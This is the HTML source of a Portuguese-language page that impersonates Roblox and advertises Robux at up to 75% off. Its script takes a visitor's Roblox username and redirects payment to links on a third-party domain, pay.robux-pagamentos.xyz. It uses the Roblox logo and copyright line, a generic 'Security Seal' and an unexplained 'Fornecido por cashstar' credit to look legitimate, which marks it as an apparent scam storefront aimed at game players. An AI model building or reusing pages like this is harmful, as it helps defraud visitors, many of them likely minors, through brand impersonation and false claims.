<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=AW-17270649227">
</script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'AW-17270649227');
</script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Roblox - Compre Robux com Desconto</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        @font-face {
            font-family: 'Burbank';
            src: url('https://fonts.cdnfonts.com/css/burbank-big-condensed');
        }
        body {
            font-family: 'Burbank', sans-serif;
            color: #FFF;
            margin: 0;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
        }
        .robux-icon {
            width: 40px;
            height: 40px;
        }
        .quantity-btn {
            background-color: #4B5563;
            border-radius: 8px;
            transition: background-color 0.3s ease;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 8px;
        }
        .selected {
            background-color: #2563EB;
        }
        .footer {
            background-color: #1A1A1A;
            border-top: 1px solid #333;
        }
        body::before {
            content: '';
            position: fixed;
            top: 64px;
            bottom: 0;
            left: 0;
            right: 0;
            background-color: #000;
            background-image: url('https://i.ibb.co/NdQcGJCK/Chat-GPT-Image-24-de-jun-de-2025-21-54-06.png');
            background-repeat: no-repeat;
            background-position: center center;
            background-size: cover;
            filter: blur(5px);
            -webkit-filter: blur(5px);
            z-index: -1;
        }
        .hero-section {
            background: none;
            position: relative;
            z-index: 1;
        }
        .content-wrapper {
            flex-grow: 1;
            position: relative;
            z-index: 1;
        }
        header, footer {
            position: relative;
            z-index: 2;
            background: none;
        }
        @media (max-width: 767px) {
            body::before {
                top: 64px;
            }
            .hero-section {
                padding-top: 80px;
                padding-bottom: 12px;
            }
        }
        @media (min-width: 768px) {
            body::before {
                top: 120px;
            }
            .hero-section {
                padding-top: 120px;
            }
        }
        .modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.8);
            z-index: 1000;
        }
        .modal-content {
            background-color: #2D2D2D;
            margin: 10% auto;
            padding: 20px;
            border-radius: 8px;
            width: 90%;
            max-width: 400px;
            text-align: center;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.3);
        }
        .close {
            color: #888;
            float: right;
            font-size: 24px;
            cursor: pointer;
        }
        .close:hover {
            color: #FFF;
        }
    </style>
    <script>
        function updateSelection(amount, price, button) {
            document.querySelectorAll('.quantity-btn').forEach(btn => {
                btn.classList.remove('selected');
                btn.classList.add('bg-gray-700', 'text-white');
            });
            button.classList.remove('bg-gray-700');
            button.classList.add('selected', 'bg-blue-600', 'text-white');
            const selectedAmount = document.getElementById('selected-amount');
            selectedAmount.textContent = `${amount} Robux`;
            const selectedPrice = document.getElementById('selected-price');
            selectedPrice.textContent = `${price}`;
            selectedAmount.classList.remove('text-blue-500');
            selectedPrice.classList.add('text-blue-500');
        }
        function showModal() {
            const selectedPrice = document.getElementById('selected-price').textContent;
            if (selectedPrice !== '0,00') {
                document.getElementById('modal').style.display = 'block';
                document.getElementById('price-display').textContent = selectedPrice;
            } else {
                alert('Por favor, selecione uma quantidade antes de prosseguir.');
            }
        }
        function closeModal() {
            document.getElementById('modal').style.display = 'none';
        }
        function proceedToCheckout() {
            const username = document.getElementById('username').value.trim();
            const price = document.getElementById('price-display').textContent;
            if (username) {
                let checkoutUrl = '';
                switch (price) {
                    case '9,90':
                        checkoutUrl = 'https://pay.robux-pagamentos.xyz/QqyLgqo2lP0ZvkE';
                        break;
                    case '17,90':
                        checkoutUrl = 'https://pay.robux-pagamentos.xyz/lDW0ZaJe4WdGN7E';
                        break;
                    case '39,90':
                        checkoutUrl = 'https://pay.robux-pagamentos.xyz/KV603koNQ1W3w8y';
                        break;
                    case '69,90':
                        checkoutUrl = 'https://pay.robux-pagamentos.xyz/QqyLgqoN7b0ZvkE';
                        break;
                    case '119,90':
                        checkoutUrl = 'https://pay.robux-pagamentos.xyz/a6pVgd2NlqkZk7B';
                        break;
                    default:
                        checkoutUrl = 'https://example.com/checkout';
                }
                window.location.href = `${checkoutUrl}?username=${encodeURIComponent(username)}&price=${encodeURIComponent(price)}`;
            } else {
                alert('Por favor, insira um nome de usuário válido.');
            }
        }
    </script>
</head>
<body class="flex flex-col min-h-screen">
    <header class="bg-black shadow-md fixed top-0 w-full z-10">
        <div class="container mx-auto px-4 py-3 flex justify-between items-center">
            <a href="index.html"><img src="https://i.ibb.co/Ng2QNfsD/roblox-logo-transparent-removebg-preview.png" alt="Roblox Logo" class="h-10 md:h-12"></a>
            <nav class="flex items-center space-x-4">
                <a href="index.html" class="text-gray-400 hover:text-blue-400">
                    <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M3 12l2-2m0 0l7-7 7 7M5 10v10a1 1 0 001 1h3m10-11l2 2m-2-2v10a1 1 0 01-1 1h-3m-6 0a1 1 0 001-1v-4a1 1 0 011-1h2a1 1 0 011 1v4a1 1 0 001 1m-6 0h6"></path>
                    </svg>
                </a>
                <a href="index.html" class="text-gray-400 hover:text-blue-400">
                    <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M16 7a4 4 0 11-8 0 4 4 0 018 0zM12 14a7 7 0 00-7 7h14a7 7 0 00-7-7z"></path>
                    </svg>
                </a>
            </nav>
        </div>
    </header>
    <div class="content-wrapper flex-grow">
        <section class="hero-section">
            <div class="container mx-auto px-4 text-center">
                <h1 class="text-3xl md:text-4xl font-bold mb-4 text-white">
                    Compre Robux com até 75% de desconto!
                </h1>
                <p class="text-lg md:text-xl mb-4 text-white">
                    *Entrega automática direto na sua conta Roblox
                </p>
            </div>
        </section>
        <section class="py-8">
            <div class="container mx-auto px-4 space-y-6">
                <div>
                    <h2 class="text-xl md:text-2xl font-bold mb-4 text-white">Quantidade de Robux:</h2>
                    <div class="grid grid-cols-2 md:grid-cols-6 lg:grid-cols-6 gap-2">
                        <button onclick="updateSelection(1000, '9,90', this)" class="quantity-btn bg-gray-700 text-white py-3 rounded-lg font-semibold flex items-center justify-center gap-2">
                            <img src="https://upload.wikimedia.org/wikipedia/commons/3/39/Robloxi_valuuta_%22Robux%22_Ikoon.png" alt="Robux Icon" class="w-6 h-6">
                            1.000
                        </button>
                        <button onclick="updateSelection(2000, '17,90', this)" class="quantity-btn bg-gray-700 text-white py-3 rounded-lg font-semibold flex items-center justify-center gap-2">
                            <img src="https://upload.wikimedia.org/wikipedia/commons/3/39/Robloxi_valuuta_%22Robux%22_Ikoon.png" alt="Robux Icon" class="w-6 h-6">
                            2.000
                        </button>
                        <button onclick="updateSelection(5250, '39,90', this)" class="quantity-btn bg-gray-700 text-white py-3 rounded-lg font-semibold flex items-center justify-center gap-2">
                            <img src="https://upload.wikimedia.org/wikipedia/commons/3/39/Robloxi_valuuta_%22Robux%22_Ikoon.png" alt="Robux Icon" class="w-6 h-6">
                            5.250
                        </button>
                        <button onclick="updateSelection(11000, '69,90', this)" class="quantity-btn bg-gray-700 text-white py-3 rounded-lg font-semibold flex items-center justify-center gap-2">
                            <img src="https://upload.wikimedia.org/wikipedia/commons/3/39/Robloxi_valuuta_%22Robux%22_Ikoon.png" alt="Robux Icon" class="w-6 h-6">
                            11.000
                        </button>
                        <button onclick="updateSelection(24000, '119,90', this)" class="quantity-btn bg-gray-700 text-white py-3 rounded-lg font-semibold flex items-center justify-center gap-2">
                            <img src="https://upload.wikimedia.org/wikipedia/commons/3/39/Robloxi_valuuta_%22Robux%22_Ikoon.png" alt="Robux Icon" class="w-6 h-6">
                            24.000
                        </button>
                        <button class="quantity-btn bg-gray-700 text-white py-3 rounded-lg font-semibold flex items-center justify-center gap-2">
                            <img src="https://upload.wikimedia.org/wikipedia/commons/3/39/Robloxi_valuuta_%22Robux%22_Ikoon.png" alt="Robux Icon" class="w-6 h-6">
                            Other
                        </button>
                    </div>
                </div>
                <div class="bg-gray-800 p-4 rounded-lg text-center">
                    <p class="text-lg md:text-xl font-semibold">Você selecionou: <span id="selected-amount" class="text-white">0 Robux</span></p>
                    <p class="text-lg md:text-xl font-semibold">Este valor é: <span class="text-blue-500">R$<span id="selected-price" class="text-blue-500">0,00</span></span></p>
                </div>
                <div class="text-center">
                    <button onclick="showModal()" class="w-full md:w-auto px-6 py-3 md:px-8 md:py-4 bg-blue-600 text-white rounded-lg font-semibold hover:bg-blue-700 transition duration-300 ease-in-out hover:scale-105 mx-auto block">
                        Comprar Agora
                    </button>
                </div>
                <p class="text-sm md:text-base text-gray-400 text-center">Fornecido por cashstar</p>
            </div>
        </section>
    </div>
    <div id="modal" class="modal">
        <div class="modal-content">
            <span class="close" onclick="closeModal()">×</span>
            <h2 class="text-2xl font-bold mb-4 text-white">Insira seu Nome de Usuário</h2>
            <p class="text-gray-300 mb-4">Digite seu nome de usuário do Roblox para receber os Robux.</p>
            <input type="text" id="username" placeholder="Seu nome de usuário" class="w-full p-2 mb-4 bg-gray-700 text-white rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-600">
            <p class="text-lg font-semibold">Valor a pagar: <span class="text-blue-500">R$<span id="price-display" class="text-blue-500">0,00</span></span></p>
            <button onclick="proceedToCheckout()" class="mt-4 w-full px-6 py-3 bg-green-600 text-white rounded-lg font-semibold hover:bg-green-700 transition duration-300 ease-in-out">
                Finalizar Aventura
            </button>
        </div>
    </div>
    <footer class="bg-black text-white py-4">
        <div class="container mx-auto px-4 text-center">
            <div class="flex flex-col md:flex-row justify-center items-center space-y-2 md:space-y-0 md:space-x-6">
                <a href="terms-of-use.html" class="text-gray-300 hover:text-blue-400 font-medium">Termos de Uso</a>
                <a href="privacy-policy.html" class="text-gray-300 hover:text-blue-400 font-medium">Política de Privacidade</a>
                <a href="contact.html" class="text-gray-300 hover:text-blue-400 font-medium">Contato</a>
                <a href="support.html" class="text-gray-300 hover:text-blue-400 font-medium">Suporte</a>
            </div>
            <div class="mt-4 flex justify-center space-x-4">
                <img src="https://d3ugyf2ht6aenh.cloudfront.net/stores/001/675/550/themes/amazonas/img-1922006266-1679250880-d974b9570d119e845771e0a10c07d6cc1679250880.png?821375030" alt="Security Seal" class="h-12">
            </div>
            <p class="text-sm text-gray-500 mt-2">© 2018 Roblox. Todos os direitos reservados. Compra com segurança.</p>
        </div>
    </footer>
</body>
</html>
